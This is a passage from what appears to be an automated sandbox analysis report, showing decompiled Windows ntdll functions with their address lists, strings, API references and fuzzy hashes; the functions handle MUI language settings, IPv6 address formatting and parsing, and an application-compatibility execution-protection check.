								E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0087718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0085E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00852340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0086E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0085E2A8(_t322,  &_v68, _v16);
								if(E00875553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0086E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0085E2A8(_t322,  &_v68, _t236);
								if(E00875553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0087718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0085E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00852340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0086E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0085E2A8(_v12,  &_v68, _v16);
							if(E00875553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0086E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0085E2A8(_t322,  &_v68, _t269);
							if(E00875553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0087718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0085E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00852340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0086E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0085E2A8(_v12,  &_v68, _v16);
						if(E00875553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0086E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0085E2A8(_t322,  &_v68, _t296);
						if(E00875553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x00878788
0x00878788
0x00878791
0x00878794
0x00878798
0x0087879b
0x0087879e
0x008787a1
0x008787a4
0x008787a7
0x008787aa
0x008787af
0x008c1ad3
0x00878b0a
0x00878b0d
0x00878b13
0x00878b19
0x00878b1f
0x00878b25
0x00878b2b
0x00878b31
0x00878b37
0x00878b3d
0x00878b46
0x00878b46
0x008787c6
0x008787d0
0x008c1ae0
0x008c1ae6
0x008c1af8
0x008c1af8
0x008c1afd
0x008c1afe
0x008c1b01
0x008c1b06
0x008c1b06
0x008787d6
0x008787f2
0x008787f7
0x00878807
0x0087880a
0x0087880f
0x00878810
0x00878813
0x00878818
0x00878818
0x0087882c
0x00878831
0x00878838
0x00878908
0x00878920
0x008789f0
0x00878a08
0x00878af6
0x00878af6
0x00878af8
0x00878afb
0x008c1beb
0x008c1beb
0x00878b04
0x008c1bf8
0x008c1c0e
0x008c1c13
0x008c1c16
0x008c1c16
0x008c1bf8
0x00000000
0x00878b04
0x00878a0e
0x00878a11
0x00878a14
0x00878a15
0x00878a18
0x00878a22
0x00878b59
0x00878a28
0x00878a3c
0x00878a3c
0x00878a42
0x008c1bb0
0x008c1b11
0x008c1b11
0x00000000
0x00878a48
0x00878a51
0x00878a5b
0x00878a5e
0x00878a61
0x00878a69
0x00878a69
0x00878a6d
0x00000000
0x00000000
0x00878a74
0x00878a7c
0x00878a7d
0x00878a91
0x00878a93
0x00878a93
0x00878a98
0x00878a9b
0x00878aa1
0x00878aa1
0x00878aa4
0x00878aaa
0x00878ab1
0x00878ac5
0x00878ac7
0x00878ac7
0x00878ac5
0x00878ace
0x008c1bc9
0x008c1bce
0x008c1bd2
0x008c1bd2
0x00878ad8
0x00878aeb
0x00878aeb
0x00878af0
0x00878af4
0x00000000
0x00878af4
0x00878a42
0x00878926
0x00878929
0x0087892c
0x0087892d
0x00878930
0x00878935
0x0087893a
0x00878b51
0x00878940
0x00878954
0x00878954
0x0087895a
0x008c1b63
0x00000000
0x00878960
0x00878969
0x00878973
0x00878976
0x00878979
0x0087897e
0x00878981
0x00878981
0x00878986
0x00000000
0x00000000
0x008c1b6e
0x008c1b74
0x008c1b7b
0x008c1b8f
0x008c1b91
0x008c1b91
0x008c1b99
0x008c1b9c
0x008c1ba2
0x008c1ba2
0x0087898c
0x00878992
0x00878999
0x008789ad
0x008c1ba8
0x008c1ba8
0x008789ad
0x008789b6
0x008789c8
0x008789cd
0x008789d0
0x008789d0
0x008789d6
0x008789e8
0x008789e8
0x008789ed
0x00000000
0x008789ed
0x0087895a
0x0087883e
0x00878841
0x00878844
0x00878845
0x00878848
0x0087884d
0x00878852
0x00878b49
0x00878858
0x0087886c
0x0087886c
0x00878872
0x008c1b0e
0x00000000
0x00878878
0x00878881
0x0087888b
0x0087888e
0x00878891
0x00878896
0x00878899
0x00878899
0x0087889e
0x00000000
0x00000000
0x008c1b21
0x008c1b27
0x008c1b2e
0x008c1b42
0x008c1b44
0x008c1b44
0x008c1b4c
0x008c1b4f
0x008c1b55
0x008c1b55
0x008788a4
0x008788aa
0x008788b1
0x008788c5
0x008c1b5b
0x008c1b5b
0x008788c5
0x008788ce
0x008788e0
0x008788e5
0x008788e8
0x008788e8
0x008788ee
0x00878900
0x00878900
0x00878905
0x00000000
0x00878905

APIs

_wcspbrk.LIBCMT ref: 00878891
_wcspbrk.LIBCMT ref: 00878979
_wcspbrk.LIBCMT ref: 00878A61
_wcspbrk.LIBCMT ref: 00878A9B
_wcspbrk.LIBCMT ref: 008C1B9C

Strings

Kernel-MUI-Number-Allowed, xrefs: 008787E6
Kernel-MUI-Language-Disallowed, xrefs: 00878914
Kernel-MUI-Language-SKU, xrefs: 008789FC
WindowsExcludedProcs, xrefs: 008787C1
Kernel-MUI-Language-Allowed, xrefs: 00878827

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: c5a51142370d0434135fa3b376826fdf8b195fd2200aaa80b8763934b98a8a23
Instruction ID: 1c6edd887fdcd274270d59fabc44af375c0b1263074298959232ef17e080710c
Opcode Fuzzy Hash: c5a51142370d0434135fa3b376826fdf8b195fd2200aaa80b8763934b98a8a23
Instruction Fuzzy Hash: 30F1E4B2D00209EFCF15DF98C985AAEBBB9FB08304F14846AE505E7251EB34DA45DB61

Uniqueness

Uniqueness Score: -1.00%

Function 008913CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E008913CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00887707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x852926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00887707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x859cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00887707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00887707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00887707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00887707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x008913d5
0x008913d9
0x008913dc
0x008913de
0x008913e1
0x008913e8
0x008913ee
0x008be8fd
0x00000000
0x008be921
0x008be921
0x008be928
0x008be982
0x008be98a
0x00000000
0x008be99a
0x008be99e
0x008be9a3
0x008be9a8
0x008be9b9
0x008be978
0x00000000
0x008be978
0x008be98a
0x008be92a
0x008be931
0x008be944
0x008be944
0x008be950
0x008be954
0x008be959
0x008be95e
0x008be963
0x008be970
0x00000000
0x008be975
0x008be93b
0x008be980
0x00000000
0x008be980
0x008be942
0x008be94b
0x00000000
0x008be94b
0x00000000
0x008be942
0x008913f4
0x008913f4
0x008913f9
0x008913fc
0x008913ff
0x00891406
0x008be9cc
0x008be9d2
0x008be9d2
0x008be9cc
0x0089140c
0x00891411
0x00891431
0x0089143a
0x0089143c
0x0089143f
0x0089143f
0x00891442
0x00891447
0x008914a8
0x008914ac
0x008be9e2
0x008be9e7
0x008be9ec
0x008bea05
0x008bea05
0x00000000
0x00891449
0x00000000
0x00891449
0x0089144c
0x00891459
0x00891462
0x00891469
0x0089146a
0x00891470
0x00891473
0x00891476
0x00891476
0x00891490
0x00891495
0x0089138e
0x00891390
0x00891397
0x00891398
0x00891399
0x008913a1
0x008913a4
0x008913a4
0x00891498
0x0089149c
0x0089149f
0x008914a2
0x00000000
0x00000000
0x008914a4
0x00000000
0x008914a4
0x00891413
0x00891415
0x00891416
0x00891419
0x0089141c
0x00891422
0x008913b7
0x008913bc
0x008913bf
0x008913bf
0x008913c2
0x00891424
0x00891424
0x00891424
0x00891427
0x0089142b
0x0089142c
0x0089142c
0x0089142c
0x00000000
0x0089141c
0x00891411

APIs

___swprintf_l.LIBCMT ref: 0089146B
___swprintf_l.LIBCMT ref: 00891490
___swprintf_l.LIBCMT ref: 008BE970

Strings

ffff:, xrefs: 008BE94B
:%u.%u.%u.%u, xrefs: 008BE9F4
::%hs%u.%u.%u.%u, xrefs: 008BE967
::ffff:0:%u.%u.%u.%u, xrefs: 008BE9B0

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: c1f18d67f22890b000c5159bb32cb89c8a30272cf68ace887042199bec8d9b2a
Instruction ID: a6fe69c3a6269f7ec4c6c29c1ca7d135ab1b205ff04bb15633e075aff73f63ab
Opcode Fuzzy Hash: c1f18d67f22890b000c5159bb32cb89c8a30272cf68ace887042199bec8d9b2a
Instruction Fuzzy Hash: 6F612771908656AACF24EF5DC8848BEBBB6FF94301718C02DE4D6C7741D634AA44DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00887EFD, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00887EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x932088; // 0x7768e72b
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00887F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E008A3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0085DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x934218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E008A3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00860D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E008A3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00868375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E008A3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E008CE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E008A3F92();
					_t38 = 1;
					L2:
					return E0085E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x00887f08
0x00887f0f
0x00887f12
0x00887f1b
0x00887f31
0x008a3ead
0x008a3eb4
0x00000000
0x00000000
0x008a3eba
0x008a3ecd
0x008a3ed2
0x008a3ee1
0x008a3ee7
0x008a3eec
0x008a3f12
0x008a3f18
0x008a3f1a
0x00000000
0x00000000
0x008a3f20
0x008a3f26
0x008a3f28
0x00000000
0x00000000
0x008a3f2e
0x008a3f30
0x00000000
0x00000000
0x008a3f3a
0x008a3f3b
0x008a3f53
0x008a3f64
0x008a3f69
0x008a3f6c
0x008a3f6d
0x008a3f6f
0x008ae304
0x008ae30f
0x008ae315
0x008ae31e
0x008ae321
0x008ae327
0x008ae329
0x00000000
0x00000000
0x00000000
0x00000000
0x008ae32f
0x008ae32f
0x008ae337
0x008ae33a
0x008ae33b
0x008ae33d
0x008ae33f
0x008ae341
0x008ae341
0x008ae34e
0x008ae353
0x008ae358
0x008ae35d
0x008ae35f
0x00000000
0x00000000
0x008ae365
0x008ae365
0x008ae368
0x008ae36e
0x00000000
0x00000000
0x008ae374
0x008ae32f
0x008a3f75
0x008a3f7a
0x008a3f7c
0x008a3f7e
0x008a3f86
0x00887f39
0x00887f47
0x00887f47
0x00887f37
0x00887f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 008A3F12

Strings

CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 008A3F75
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 008A3EC4
ExecuteOptions, xrefs: 008A3F04
+hw, xrefs: 00887F08
Execute=1, xrefs: 008A3F5E
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 008AE2FB
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 008A3F4A
CLIENT(ntdll): Processing section info %ws..., xrefs: 008AE345

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
String ID: +hw$CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-2784941529
Opcode ID: a889663e29e480a8d7585baa700ec22e8e1802243ea4249e0ed5a5ec47c21d24
Instruction ID: bed972a14b8c34c156e0a6a0fdd92c5559f5f8cb9ee1abec0e68ee149453483b
Opcode Fuzzy Hash: a889663e29e480a8d7585baa700ec22e8e1802243ea4249e0ed5a5ec47c21d24
Instruction Fuzzy Hash: 2241D731A8060D7ADF20EA94DCC6FDA73BCFB15705F1405A9B605E6181EE70DB498F61

Uniqueness

Uniqueness Score: -1.00%

Function 00890B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00890B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00868980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0085DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00890CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00890CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E008906BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E008906BA(_t135, _t178) == 0 || E00890A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00890CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00890CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E008906BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E008906BA(_t124, _t142) == 0 || E00890A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x00890b21
0x00890b24
0x00890b27
0x00890b2a
0x00890b2d
0x00890b30
0x00890b33
0x00890b36
0x00890b39
0x00890b3e
0x00890c65
0x00890c68
